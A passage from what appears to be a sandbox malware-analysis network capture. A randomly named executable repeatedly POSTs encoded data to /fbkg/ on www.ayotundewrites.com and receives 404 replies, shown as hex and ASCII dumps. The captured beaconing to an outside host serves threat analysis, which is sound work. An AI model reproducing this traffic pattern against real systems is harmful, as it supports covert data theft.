a3 cf 4a 6a 01 be 01 5c d3 80 4e dc d9 8d 53 94 19 7c 56 3b f1 f6 85 69 91 1f fc cd c3 48 af 66 b3 c5 9b 34 9d 01 40 0a 5f 6c 4d 4e 48 15 a3 19 e7 f0 49 97 8e 3c d5 0c 8d 98 a1 aa 4a 68 15 94 06 c5 57 b0 38 44 50 52 a3 e2 de c9 64 32 c1 56 26 d5 59 64 d8 3c 76 86 9c f8 0f db 5a fa 81 10 a6 15 a8 8e 18 25 92 9d 23 77 e2 a1 45 ef d5 1e 41 3a 96 30 89 35 ad 32 26 99 83 ef b0 d4 b5 2e e5 36 46 90 91 48 a1 12 ec ef a7 bf 89 3e 51 3d ff 39 a1 0c 88 54 63 7d c4 68 f6 40 c3 21 db 31 57 06 77 d4 43 29 44 21 32 50 86 ca ea 79 84 ec 7a 06 cd 52 59 27 4c 3c 4a fb 75 79 2f 07 41 2d 2b 03 7e d0 5c 36 82 36 06 ab 88 48 a4 66 c7 51 d1 31 87 4f 32 28 02 71 8b ca 4a 9d 54 cb e2 f6 b2 a4 87 2c 53 52 df 88 dd 3f e0 40 39 94 31 b3 5e dc 9b ba 58 61 ad 7a c3 59 cc b5 dd de 82 32 83 1a fd 51 e8 8f f8 89 39 90 18 b2 fb 08 42 4b fd be 09 12 5a 75 8f bf f0 ac 51 5d 37 86 82 31 02 06 72 f7 4a c6 5e f4 4a 5f 0e 46 78 dd 76 06 df cb 66 54 53 47 a7 0e c6 f8 63 13 c5 9b 46 46 64 a7 f7 a2 b6 9d 96 d3 68 c9 38 2d a4 a4 ef 7a df 88 b9 11 44 61 8c c2 68 d4 fa 01 a1 91 64 41 b1 6c 20 f0 80 46 9e a6 16 43 ab ad 6e fb f6 a0 ff ea c5 c7 a9 6f d2 26 7c 54 25 1b 99 f6 e0 f6 48 fd 89 48 77 f2 4f aa 8f ea 9d de 37 2c 5b 37 44 8a 74 35 fb 17 f8 f5 91 1f d6 05 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 34cuTMo8WLumXtmmEM(rEhQC9Ohg=f7zKr{I_Xg<|N iy>C6&o5ggK*l(_&PU"+,)erNrZ&P2a|O(<:#PMVL+%sKV(gMzTeiH|N~mqY=Zq/6RWArS3VPQ:YF{eu9Z(ON(/?[e'':!}~bwPb&REy&dtY>J_M?7+vRJpX4Jj\NS|V;iHf4@_lMNHI<JhW8DPRd2V&Yd<vZ%#wEA:052&.6FH>Q=9Tc}h@!1WwC)D!2PyzRY'L<Juy/A-+~\66HfQ1O2(qJT,SR?@91^XazY2Q9BKZuQ]71rJ^J_FxvfTSGcFFdh8-zDahdAl FCno&|T%HHwO7,[7Dt50


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                51192.168.11.205017883.229.19.7680C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:53.991980076 CET1113OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.ayotundewrites.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.ayotundewrites.com
                                                                                                                                                                                                Referer: http://www.ayotundewrites.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 5a 73 50 41 7a 64 71 73 66 6a 63 32 59 35 58 34 49 38 38 44 4e 6e 6f 69 56 51 33 49 46 45 69 70 46 45 30 56 6d 4a 32 52 61 71 4f 30 67 42 56 6d 76 46 6e 4a 70 4f 77 56 73 72 76 4b 6f 45 4b 44 43 47 35 45 6b 35 36 4e 30 4e 34 4c 6c 4a 74 52 4b 57 49 44 6c 6e 4e 4a 56 36 4d 68 67 39 70 37 52 38 51 4a 77 6d 38 2b 58 6b 42 62 34 4e 67 44 56 4c 6e 57 59 45 6a 42 4a 46 72 77 6e 61 35 2f 6c 36 6b 63 51 67 74 51 2f 41 42 62 35 44 4b 51 77 6b 6c 36 4b 49 61 50 54 55 4c 75 53 64 2b 4b 6a 6e 57 6c 41 4d 33 77 51 33 72 61 73 6c 2b 78 63 51 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=ZsPAzdqsfjc2Y5X4I88DNnoiVQ3IFEipFE0VmJ2RaqO0gBVmvFnJpOwVsrvKoEKDCG5Ek56N0N4LlJtRKWIDlnNJV6Mhg9p7R8QJwm8+XkBb4NgDVLnWYEjBJFrwna5/l6kcQgtQ/ABb5DKQwkl6KIaPTULuSd+KjnWlAM3wQ3rasl+xcQ==
                                                                                                                                                                                                Nov 17, 2023 19:30:54.180856943 CET1114INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:30:54 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 33 34 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 92 9a 6d 16 58 74 6d 03 6d ec 45 0c a4 4d 90 a8 28 72 a4 a5 91 45 84 e2 68 c9 51 14 01 fd 43 39 ef 4f c8 1f db a1 68 67 d3 8f 3d d1 a4 e6 bd 99 f7 66 c6 8b 37 eb ab f3 e2 ee 7a 03 17 c5 a7 4b b8 fe f2 f1 72 7b 0e 49 9a e7 5f df 9d e7 f9 ba 58 c7 0f 67 d9 db d3 3c df 7c 4e 20 69 98 bb f7 79 3e 0c 43 36 bc cb c8 ed f3 e2 26 6f b8 35 67 b9 67 a7 4b ce 2a ae 92 d5 6c 11 de c0 28 bb 5f 26 b5 9b 1e 50 55 f2 de 22 2b 08 2c 29 fe dd eb 87 65 72 4e 96 d1 72 5a 8c 1d 26 50 c6 db 32 61 7c e4 89 f8 4f 28 1b e5 3c f2 b2 e7 3a fd 23 50 4d 1c 56 b5 b8 4c 1c ed 88 fd 2b 9c 25 8b 73 4b da 56 f8 28 67 4d c6 d0 f0 02 7a 9d b8 54 65 83 69 48 e8 c8 7c c7 90 4e 9f 7e 09 ea 9c da b7 ea 7f a2 8b 6d 71 b9 59 9d bd 3d 83 cf c4 f0 17 f5 b6 5a e4 f1 71 b6 c8 2f 36 1f d6 52 fc c7 ab f5 9d 1c 17 a7 ab 57 41 72 9b 15 0d 82 13 53 d0 33 56 50 51 d9 b7 e2 0b 0c ca 83 15 ba 3a d0 01 59 e0 46 7b f0 e8 1e d0 65 b3 c5 75 e0 ba 39 12 5a 28 1c f5 0f cf 4f 92 4e 28 2f f1 3f 9e 0a 5b 65 ab e7 27 b0 27 0a 3a 21 7d 7e 62 b9 89 f8 10 0f be 77 50 62 e4 ed 7f 26 86 8d 9d 9c 52 15 45 ea 8d 79 a1 26 f0 64 74 a9 59 3e 4a a9 c2 01 18 a3 9f ff 91 5f 10 04 4d c4 ba a2 ef 98 3f ac d7 37 9b db db d5 ec 2b ee e0 76 52 04 4a 14 cb 70 a9 91 58 f4 e2 e0 34 a3 cf 4a 6a 01 be 01 5c d3 80 4e dc d9 8d 53 94 19 7c 56 3b f1 f6 85 69 91 1f fc cd c3 48 af 66 b3 c5 9b 34 9d 01 40 0a 5f 6c 4d 4e 48 15 a3 19 e7 f0 49 97 8e 3c d5 0c 8d 98 a1 aa 4a 68 15 94 06 c5 57 b0 38 44 50 52 a3 e2 de c9 64 32 c1 56 26 d5 59 64 d8 3c 76 86 9c f8 0f db 5a fa 81 10 a6 15 a8 8e 18 25 92 9d 23 77 e2 a1 45 ef d5 1e 41 3a 96 30 89 35 ad 32 26 99 83 ef b0 d4 b5 2e e5 36 46 90 91 48 a1 12 ec ef a7 bf 89 3e 51 3d ff 39 a1 0c 88 54 63 7d c4 68 f6 40 c3 21 db 31 57 06 77 d4 43 29 44 21 32 50 86 ca ea 79 84 ec 7a 06 cd 52 59 27 4c 3c 4a fb 75 79 2f 07 41 2d 2b 03 7e d0 5c 36 82 36 06 ab 88 48 a4 66 c7 51 d1 31 87 4f 32 28 02 71 8b ca 4a 9d 54 cb e2 f6 b2 a4 87 2c 53 52 df 88 dd 3f e0 40 39 94 31 b3 5e dc 9b ba 58 61 ad 7a c3 59 cc b5 dd de 82 32 83 1a fd 51 e8 8f f8 89 39 90 18 b2 fb 08 42 4b fd be 09 12 5a 75 8f bf f0 ac 51 5d 37 86 82 31 02 06 72 f7 4a c6 5e f4 4a 5f 0e 46 78 dd 76 06 df cb 66 54 53 47 a7 0e c6 f8 63 13 c5 9b 46 46 64 a7 f7 a2 b6 9d 96 d3 68 c9 38 2d a4 a4 ef 7a df 88 b9 11 44 61 8c c2 68 d4 fa 01 a1 91 64 41 b1 6c 20 f0 80 46 9e a6 16 43 ab ad 6e fb f6 a0 ff ea c5 c7 a9 6f d2 26 7c 54 25 1b 99 f6 e0 f6 48 fd 89 48 77 f2 4f aa 8f ea 9d de 37 2c 5b 37 44 8a 74 35 fb 17 f8 f5 91 1f d6 05 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 34cuTMo8WLumXtmmEM(rEhQC9Ohg=f7zKr{I_Xg<|N iy>C6&o5ggK*l(_&PU"+,)erNrZ&P2a|O(<:#PMVL+%sKV(gMzTeiH|N~mqY=Zq/6RWArS3VPQ:YF{eu9Z(ON(/?[e'':!}~bwPb&REy&dtY>J_M?7+vRJpX4Jj\NS|V;iHf4@_lMNHI<JhW8DPRd2V&Yd<vZ%#wEA:052&.6FH>Q=9Tc}h@!1WwC)D!2PyzRY'L<Juy/A-+~\66HfQ1O2(qJT,SR?@91^XazY2Q9BKZuQ]71rJ^J_FxvfTSGcFFdh8-zDahdAl FCno&|T%HHwO7,[7Dt50


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                52192.168.11.205017983.229.19.7680C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:56.707088947 CET1116OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.ayotundewrites.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.ayotundewrites.com
                                                                                                                                                                                                Referer: http://www.ayotundewrites.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 5a 73 50 41 7a 64 71 73 66 6a 63 32 59 5a 48 34 48 2f 55 44 59 33 6f 6c 61 77 33 49 4c 6b 69 74 46 45 6f 56 6d 49 43 42 61 59 61 30 67 6c 52 6d 75 45 6e 4a 6f 4f 77 56 34 37 76 31 73 45 4b 4d 43 47 46 69 6b 39 2b 4e 30 4e 73 4c 6b 2f 78 52 62 57 49 63 75 48 4e 47 64 61 4d 67 6b 39 70 68 52 38 63 7a 77 6e 34 2b 51 55 74 62 35 50 34 44 66 36 6e 56 50 6b 6a 48 64 31 72 33 75 36 35 78 6c 39 74 68 51 69 38 76 2f 54 64 62 35 67 43 51 78 6b 6c 6c 43 34 61 49 61 30 4b 65 57 49 61 50 6d 68 32 6b 52 4d 72 71 51 6a 50 4b 36 52 6d 36 4d 62 2f 57 56 33 62 66 69 73 4b 42 35 5a 48 6d 33 65 42 70 4e 33 66 32 45 77 53 30 78 54 48 34 59 4f 7a 4b 46 2f 71 63 55 2b 4c 77 6e 6a 68 76 4e 58 6b 63 67 79 56 77 46 6a 30 70 37 71 79 47 48 2f 44 6e 74 67 36 7a 4d 75 7a 74 32 63 56 42 47 56 4e 72 4e 53 7a 69 43 51 46 37 6e 70 67 51 42 38 66 69 66 76 52 56 79 66 48 4c 44 4c 76 74 61 71 4b 37 35 4a 4e 6e 35 64 54 32 62 37 43 37 6c 30 42 61 6f 49 57 51 2b 66 77 43 63 34 49 52 2b 57 7a 76 78 50 4f 30 70 46 59 54 2b 33 50 31 36 72 45 38 73 76 62 31 37 62 2f 4e 73 6d 35 61 50 51 43 49 35 65 36 7a 4f 4d 32 48 35 76 39 41 53 33 77 50 52 30 6f 30 75 78 71 76 59 4e 30 59 45 65 4c 64 71 5a 51 4c 5a 5a 39 49 67 53 32 32 6b 4c 49 6b 6b 53 67 37 6b 32 67 6a 79 67 68 54 59 35 53 49 57 43 69 45 41 7a 4e 67 46 6d 4f 4a 33 61 43 76 49 65 2f 68 69 58 7a 7a 50 4f 32 49 4c 31 46 35 2b 65 2b 4e 52 48 64 74 45 64 5a 61 70 45 73 4d 36 67 7a 6e 54 65 68 6c 45 36 6c 4c 48 69 79 75 4c 6d 7a 53 76 42 33 74 76 2b 6c 58 79 30 51 56 55 66 31 66 38 33 6c 52 66 74 2b 7a 42 6c 65 31 66 67 38 3d
                                                                                                                                                                                                Data Ascii: T6I=ZsPAzdqsfjc2YZH4H/UDY3olaw3ILkitFEoVmICBaYa0glRmuEnJoOwV47v1sEKMCGFik9+N0NsLk/xRbWIcuHNGdaMgk9phR8czwn4+QUtb5P4Df6nVPkjHd1r3u65xl9thQi8v/Tdb5gCQxkllC4aIa0KeWIaPmh2kRMrqQjPK6Rm6Mb/WV3bfisKB5ZHm3eBpN3f2EwS0xTH4YOzKF/qcU+LwnjhvNXkcgyVwFj0p7qyGH/Dntg6zMuzt2cVBGVNrNSziCQF7npgQB8fifvRVyfHLDLvtaqK75JNn5dT2b7C7l0BaoIWQ+fwCc4IR+WzvxPO0pFYT+3P16rE8svb17b/Nsm5aPQCI5e6zOM2H5v9AS3wPR0o0uxqvYN0YEeLdqZQLZZ9IgS22kLIkkSg7k2gjyghTY5SIWCiEAzNgFmOJ3aCvIe/hiXzzPO2IL1F5+e+NRHdtEdZapEsM6gznTehlE6lLHiyuLmzSvB3tv+lXy0QVUf1f83lRft+zBle1fg8=
                                                                                                                                                                                                Nov 17, 2023 19:30:56.891144991 CET1117INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:30:56 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 33 34 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 92 9a 6d 16 58 74 6d 03 6d ec 45 0c a4 4d 90 a8 28 72 a4 a5 91 45 84 e2 68 c9 51 14 01 fd 43 39 ef 4f c8 1f db a1 68 67 d3 8f 3d d1 a4 e6 bd 99 f7 66 c6 8b 37 eb ab f3 e2 ee 7a 03 17 c5 a7 4b b8 fe f2 f1 72 7b 0e 49 9a e7 5f df 9d e7 f9 ba 58 c7 0f 67 d9 db d3 3c df 7c 4e 20 69 98 bb f7 79 3e 0c 43 36 bc cb c8 ed f3 e2 26 6f b8 35 67 b9 67 a7 4b ce 2a ae 92 d5 6c 11 de c0 28 bb 5f 26 b5 9b 1e 50 55 f2 de 22 2b 08 2c 29 fe dd eb 87 65 72 4e 96 d1 72 5a 8c 1d 26 50 c6 db 32 61 7c e4 89 f8 4f 28 1b e5 3c f2 b2 e7 3a fd 23 50 4d 1c 56 b5 b8 4c 1c ed 88 fd 2b 9c 25 8b 73 4b da 56 f8 28 67 4d c6 d0 f0 02 7a 9d b8 54 65 83 69 48 e8 c8 7c c7 90 4e 9f 7e 09 ea 9c da b7 ea 7f a2 8b 6d 71 b9 59 9d bd 3d 83 cf c4 f0 17 f5 b6 5a e4 f1 71 b6 c8 2f 36 1f d6 52 fc c7 ab f5 9d 1c 17 a7 ab 57 41 72 9b 15 0d 82 13 53 d0 33 56 50 51 d9 b7 e2 0b 0c ca 83 15 ba 3a d0 01 59 e0 46 7b f0 e8 1e d0 65 b3 c5 75 e0 ba 39 12 5a 28 1c f5 0f cf 4f 92 4e 28 2f f1 3f 9e 0a 5b 65 ab e7 27 b0 27 0a 3a 21 7d 7e 62 b9 89 f8 10 0f be 77 50 62 e4 ed 7f 26 86 8d 9d 9c 52 15 45 ea 8d 79 a1 26 f0 64 74 a9 59 3e 4a a9 c2 01 18 a3 9f ff 91 5f 10 04 4d c4 ba a2 ef 98 3f ac d7 37 9b db db d5 ec 2b ee e0 76 52 04 4a 14 cb 70 a9 91 58 f4 e2 e0 34 a3 cf 4a 6a 01 be 01 5c d3 80 4e dc d9 8d 53 94 19 7c 56 3b f1 f6 85 69 91 1f fc cd c3 48 af 66 b3 c5 9b 34 9d 01 40 0a 5f 6c 4d 4e 48 15 a3 19 e7 f0 49 97 8e 3c d5 0c 8d 98 a1 aa 4a 68 15 94 06 c5 57 b0 38 44 50 52 a3 e2 de c9 64 32 c1 56 26 d5 59 64 d8 3c 76 86 9c f8 0f db 5a fa 81 10 a6 15 a8 8e 18 25 92 9d 23 77 e2 a1 45 ef d5 1e 41 3a 96 30 89 35 ad 32 26 99 83 ef b0 d4 b5 2e e5 36 46 90 91 48 a1 12 ec ef a7 bf 89 3e 51 3d ff 39 a1 0c 88 54 63 7d c4 68 f6 40 c3 21 db 31 57 06 77 d4 43 29 44 21 32 50 86 ca ea 79 84 ec 7a 06 cd 52 59 27 4c 3c 4a fb 75 79 2f 07 41 2d 2b 03 7e d0 5c 36 82 36 06 ab 88 48 a4 66 c7 51 d1 31 87 4f 32 28 02 71 8b ca 4a 9d 54 cb e2 f6 b2 a4 87 2c 53 52 df 88 dd 3f e0 40 39 94 31 b3 5e dc 9b ba 58 61 ad 7a c3 59 cc b5 dd de 82 32 83 1a fd 51 e8 8f f8 89 39 90 18 b2 fb 08 42 4b fd be 09 12 5a 75 8f bf f0 ac 51 5d 37 86 82 31 02 06 72 f7 4a c6 5e f4 4a 5f 0e 46 78 dd 76 06 df cb 66 54 53 47 a7 0e c6 f8 63 13 c5 9b 46 46 64 a7 f7 a2 b6 9d 96 d3 68 c9 38 2d a4 a4 ef 7a df 88 b9 11 44 61 8c c2 68 d4 fa 01 a1 91 64 41 b1 6c 20 f0 80 46 9e a6 16 43 ab ad 6e fb f6 a0 ff ea c5 c7 a9 6f d2 26 7c 54 25 1b 99 f6 e0 f6 48 fd 89 48 77 f2 4f aa 8f ea 9d de 37 2c 5b 37 44 8a 74 35 fb 17 f8 f5 91 1f d6 05 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 34cuTMo8WLumXtmmEM(rEhQC9Ohg=f7zKr{I_Xg<|N iy>C6&o5ggK*l(_&PU"+,)erNrZ&P2a|O(<:#PMVL+%sKV(gMzTeiH|N~mqY=Zq/6RWArS3VPQ:YF{eu9Z(ON(/?[e'':!}~bwPb&REy&dtY>J_M?7+vRJpX4Jj\NS|V;iHf4@_lMNHI<JhW8DPRd2V&Yd<vZ%#wEA:052&.6FH>Q=9Tc}h@!1WwC)D!2PyzRY'L<Juy/A-+~\66HfQ1O2(qJT,SR?@91^XazY2Q9BKZuQ]71rJ^J_FxvfTSGcFFdh8-zDahdAl FCno&|T%HHwO7,[7Dt50


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                5283.229.19.7680192.168.11.2050179C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:56.707088947 CET1116OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.ayotundewrites.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.ayotundewrites.com
                                                                                                                                                                                                Referer: http://www.ayotundewrites.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 5a 73 50 41 7a 64 71 73 66 6a 63 32 59 5a 48 34 48 2f 55 44 59 33 6f 6c 61 77 33 49 4c 6b 69 74 46 45 6f 56 6d 49 43 42 61 59 61 30 67 6c 52 6d 75 45 6e 4a 6f 4f 77 56 34 37 76 31 73 45 4b 4d 43 47 46 69 6b 39 2b 4e 30 4e 73 4c 6b 2f 78 52 62 57 49 63 75 48 4e 47 64 61 4d 67 6b 39 70 68 52 38 63 7a 77 6e 34 2b 51 55 74 62 35 50 34 44 66 36 6e 56 50 6b 6a 48 64 31 72 33 75 36 35 78 6c 39 74 68 51 69 38 76 2f 54 64 62 35 67 43 51 78 6b 6c 6c 43 34 61 49 61 30 4b 65 57 49 61 50 6d 68 32 6b 52 4d 72 71 51 6a 50 4b 36 52 6d 36 4d 62 2f 57 56 33 62 66 69 73 4b 42 35 5a 48 6d 33 65 42 70 4e 33 66 32 45 77 53 30 78 54 48 34 59 4f 7a 4b 46 2f 71 63 55 2b 4c 77 6e 6a 68 76 4e 58 6b 63 67 79 56 77 46 6a 30 70 37 71 79 47 48 2f 44 6e 74 67 36 7a 4d 75 7a 74 32 63 56 42 47 56 4e 72 4e 53 7a 69 43 51 46 37 6e 70 67 51 42 38 66 69 66 76 52 56 79 66 48 4c 44 4c 76 74 61 71 4b 37 35 4a 4e 6e 35 64 54 32 62 37 43 37 6c 30 42 61 6f 49 57 51 2b 66 77 43 63 34 49 52 2b 57 7a 76 78 50 4f 30 70 46 59 54 2b 33 50 31 36 72 45 38 73 76 62 31 37 62 2f 4e 73 6d 35 61 50 51 43 49 35 65 36 7a 4f 4d 32 48 35 76 39 41 53 33 77 50 52 30 6f 30 75 78 71 76 59 4e 30 59 45 65 4c 64 71 5a 51 4c 5a 5a 39 49 67 53 32 32 6b 4c 49 6b 6b 53 67 37 6b 32 67 6a 79 67 68 54 59 35 53 49 57 43 69 45 41 7a 4e 67 46 6d 4f 4a 33 61 43 76 49 65 2f 68 69 58 7a 7a 50 4f 32 49 4c 31 46 35 2b 65 2b 4e 52 48 64 74 45 64 5a 61 70 45 73 4d 36 67 7a 6e 54 65 68 6c 45 36 6c 4c 48 69 79 75 4c 6d 7a 53 76 42 33 74 76 2b 6c 58 79 30 51 56 55 66 31 66 38 33 6c 52 66 74 2b 7a 42 6c 65 31 66 67 38 3d
                                                                                                                                                                                                Data Ascii: T6I=ZsPAzdqsfjc2YZH4H/UDY3olaw3ILkitFEoVmICBaYa0glRmuEnJoOwV47v1sEKMCGFik9+N0NsLk/xRbWIcuHNGdaMgk9phR8czwn4+QUtb5P4Df6nVPkjHd1r3u65xl9thQi8v/Tdb5gCQxkllC4aIa0KeWIaPmh2kRMrqQjPK6Rm6Mb/WV3bfisKB5ZHm3eBpN3f2EwS0xTH4YOzKF/qcU+LwnjhvNXkcgyVwFj0p7qyGH/Dntg6zMuzt2cVBGVNrNSziCQF7npgQB8fifvRVyfHLDLvtaqK75JNn5dT2b7C7l0BaoIWQ+fwCc4IR+WzvxPO0pFYT+3P16rE8svb17b/Nsm5aPQCI5e6zOM2H5v9AS3wPR0o0uxqvYN0YEeLdqZQLZZ9IgS22kLIkkSg7k2gjyghTY5SIWCiEAzNgFmOJ3aCvIe/hiXzzPO2IL1F5+e+NRHdtEdZapEsM6gznTehlE6lLHiyuLmzSvB3tv+lXy0QVUf1f83lRft+zBle1fg8=
                                                                                                                                                                                                Nov 17, 2023 19:30:56.891144991 CET1117INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:30:56 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 33 34 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 92 9a 6d 16 58 74 6d 03 6d ec 45 0c a4 4d 90 a8 28 72 a4 a5 91 45 84 e2 68 c9 51 14 01 fd 43 39 ef 4f c8 1f db a1 68 67 d3 8f 3d d1 a4 e6 bd 99 f7 66 c6 8b 37 eb ab f3 e2 ee 7a 03 17 c5 a7 4b b8 fe f2 f1 72 7b 0e 49 9a e7 5f df 9d e7 f9 ba 58 c7 0f 67 d9 db d3 3c df 7c 4e 20 69 98 bb f7 79 3e 0c 43 36 bc cb c8 ed f3 e2 26 6f b8 35 67 b9 67 a7 4b ce 2a ae 92 d5 6c 11 de c0 28 bb 5f 26 b5 9b 1e 50 55 f2 de 22 2b 08 2c 29 fe dd eb 87 65 72 4e 96 d1 72 5a 8c 1d 26 50 c6 db 32 61 7c e4 89 f8 4f 28 1b e5 3c f2 b2 e7 3a fd 23 50 4d 1c 56 b5 b8 4c 1c ed 88 fd 2b 9c 25 8b 73 4b da 56 f8 28 67 4d c6 d0 f0 02 7a 9d b8 54 65 83 69 48 e8 c8 7c c7 90 4e 9f 7e 09 ea 9c da b7 ea 7f a2 8b 6d 71 b9 59 9d bd 3d 83 cf c4 f0 17 f5 b6 5a e4 f1 71 b6 c8 2f 36 1f d6 52 fc c7 ab f5 9d 1c 17 a7 ab 57 41 72 9b 15 0d 82 13 53 d0 33 56 50 51 d9 b7 e2 0b 0c ca 83 15 ba 3a d0 01 59 e0 46 7b f0 e8 1e d0 65 b3 c5 75 e0 ba 39 12 5a 28 1c f5 0f cf 4f 92 4e 28 2f f1 3f 9e 0a 5b 65 ab e7 27 b0 27 0a 3a 21 7d 7e 62 b9 89 f8 10 0f be 77 50 62 e4 ed 7f 26 86 8d 9d 9c 52 15 45 ea 8d 79 a1 26 f0 64 74 a9 59 3e 4a a9 c2 01 18 a3 9f ff 91 5f 10 04 4d c4 ba a2 ef 98 3f ac d7 37 9b db db d5 ec 2b ee e0 76 52 04 4a 14 cb 70 a9 91 58 f4 e2 e0 34 a3 cf 4a 6a 01 be 01 5c d3 80 4e dc d9 8d 53 94 19 7c 56 3b f1 f6 85 69 91 1f fc cd c3 48 af 66 b3 c5 9b 34 9d 01 40 0a 5f 6c 4d 4e 48 15 a3 19 e7 f0 49 97 8e 3c d5 0c 8d 98 a1 aa 4a 68 15 94 06 c5 57 b0 38 44 50 52 a3 e2 de c9 64 32 c1 56 26 d5 59 64 d8 3c 76 86 9c f8 0f db 5a fa 81 10 a6 15 a8 8e 18 25 92 9d 23 77 e2 a1 45 ef d5 1e 41 3a 96 30 89 35 ad 32 26 99 83 ef b0 d4 b5 2e e5 36 46 90 91 48 a1 12 ec ef a7 bf 89 3e 51 3d ff 39 a1 0c 88 54 63 7d c4 68 f6 40 c3 21 db 31 57 06 77 d4 43 29 44 21 32 50 86 ca ea 79 84 ec 7a 06 cd 52 59 27 4c 3c 4a fb 75 79 2f 07 41 2d 2b 03 7e d0 5c 36 82 36 06 ab 88 48 a4 66 c7 51 d1 31 87 4f 32 28 02 71 8b ca 4a 9d 54 cb e2 f6 b2 a4 87 2c 53 52 df 88 dd 3f e0 40 39 94 31 b3 5e dc 9b ba 58 61 ad 7a c3 59 cc b5 dd de 82 32 83 1a fd 51 e8 8f f8 89 39 90 18 b2 fb 08 42 4b fd be 09 12 5a 75 8f bf f0 ac 51 5d 37 86 82 31 02 06 72 f7 4a c6 5e f4 4a 5f 0e 46 78 dd 76 06 df cb 66 54 53 47 a7 0e c6 f8 63 13 c5 9b 46 46 64 a7 f7 a2 b6 9d 96 d3 68 c9 38 2d a4 a4 ef 7a df 88 b9 11 44 61 8c c2 68 d4 fa 01 a1 91 64 41 b1 6c 20 f0 80 46 9e a6 16 43 ab ad 6e fb f6 a0 ff ea c5 c7 a9 6f d2 26 7c 54 25 1b 99 f6 e0 f6 48 fd 89 48 77 f2 4f aa 8f ea 9d de 37 2c 5b 37 44 8a 74 35 fb 17 f8 f5 91 1f d6 05 00 00 0d 0a 30 0d 0a 0d 0a
